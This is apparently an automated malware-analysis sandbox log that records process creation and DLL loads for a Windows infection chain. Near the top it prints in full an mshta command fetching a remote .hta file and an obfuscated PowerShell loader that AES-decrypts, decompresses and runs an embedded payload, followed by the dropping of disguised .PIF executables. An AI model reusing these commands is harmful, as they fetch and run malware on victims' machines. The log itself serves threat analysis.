Source: unknown	Process created: C:\Users\Public\Libraries\Ucvuiswb.PIF "C:\Users\Public\Libraries\Ucvuiswb.PIF"
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\uc.exe "C:\Users\user\AppData\Roaming\uc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif
Source: C:\Users\Public\Libraries\Ucvuiswb.PIF	Process created: C:\Users\Public\Libraries\bwsiuvcU.pif C:\Users\Public\Libraries\bwsiuvcU.pif

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
